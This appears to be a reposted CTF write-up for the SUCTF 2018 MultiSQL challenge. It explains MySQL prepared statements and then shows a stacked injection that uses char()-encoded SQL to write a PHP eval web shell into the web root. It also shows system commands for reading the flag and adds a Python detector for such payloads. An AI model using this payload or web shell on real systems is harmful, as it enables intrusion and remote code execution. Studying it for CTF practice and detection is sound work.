
[SUCTF 2018]MultiSQL MySQL prepared statements

2022-06-09 02:02:00 I·CE

Traditional MySQL query processing:

The client prepares the SQL statement

The client sends the SQL statement to the MySQL server

The MySQL server executes the SQL statement

The server returns the execution result to the client

Basic prepared-statement strategy:

The SQL statement is split into two parts:
The first part is the command and structure, the same as before
The second part is the variable data that follows
The first part is sent to the MySQL server first, which preprocesses it without actually executing it. In that statement, the variable data is represented by a placeholder such as a question mark ?

Prepared statements without parameters

Prepare the statement

prepare statement_name from "SQL statement to prepare";

prepare sql_1 from "select * from pdo";

Execute the prepared statement

execute sql_1;

Delete the prepared statement

drop prepare sql_1;

Prepared statements with parameters

Prepare the statement

prepare sql_2 from "select * from pdo where id = ?";

Define the parameter variable

set @id=2;

Pass the parameter and execute the prepared statement

execute sql_2 using @id; 

Delete the prepared statement

drop prepare sql_2;

[SUCTF 2018]MultiSQL prepared-statement injection

Bypass using char()

# Print the statement as a MySQL char(...) expression, one decimal code per character
sql = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
print('char(%s)' % ','.join(str(ord(c)) for c in sql))

payload:

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

Visit /favicon/shell.php

system('ls /');  // In the root directory 
system('cd /;cat *f*');
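
Seen from the defender's side, the payload above has a recognisable shape: a stacked statement assigns a user variable from char(...), prepares a statement from that variable, and executes it. The following Python is an added example, not part of the original post; the function names and sample values are constructed for illustration, and each char() code is assumed to stand for one character.

```python
import re
from urllib.parse import unquote_plus

CHAR_CALL = re.compile(r"char\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)
SET_VAR = re.compile(r"set\s+(@\w+)\s*:?=", re.I)
PREPARE_FROM_VAR = re.compile(r"prepare\s+\w+\s+from\s+(@\w+)", re.I)
EXECUTE = re.compile(r"\bexecute\s+\w+", re.I)


def decode_char_calls(text):
    """Return the string hidden in every char(n,n,...) call found in text."""
    decoded = []
    for match in CHAR_CALL.finditer(text):
        codes = [int(n) for n in match.group(1).split(",")]
        if all(c < 0x110000 for c in codes):  # skip values chr() cannot map
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def inspect_parameter(raw_value):
    """Flag a request parameter that stacks SET / PREPARE / EXECUTE statements."""
    value = unquote_plus(raw_value)
    # Heuristic split: a ';' inside a quoted string is also counted.
    statements = [s.strip() for s in value.split(";") if s.strip()]
    assigned = {v.lower() for v in SET_VAR.findall(value)}
    prepared = {v.lower() for v in PREPARE_FROM_VAR.findall(value)}
    return {
        "stacked": len(statements) > 1,
        # The same user variable is assigned and then used as statement text.
        "dynamic_prepare": bool(assigned & prepared) and bool(EXECUTE.search(value)),
        "decoded_sql": decode_char_calls(value),
    }


# Constructed sample values; char(...) here decodes to the harmless "select 1".
SAMPLES = [
    "2",
    "2;set @sql=char(115,101,108,101,99,116,32,49);prepare query from @sql;execute query;",
    "2%3Bset+%40s%3DCHAR(115,101,108,101,99,116,32,49)%3Bprepare+q+from+%40s%3Bexecute+q",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_parameter(sample))
```

Logging the decoded_sql value alongside the raw parameter lets an analyst read the statement that the char() encoding hides from keyword-based filters.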

XOR injection

1^1^1 returns true

Copyright notice
This article was written by [I·CE]. Please include the original link when reposting. Thanks.
https://yzsam.com/2022/159/202206081420201040.html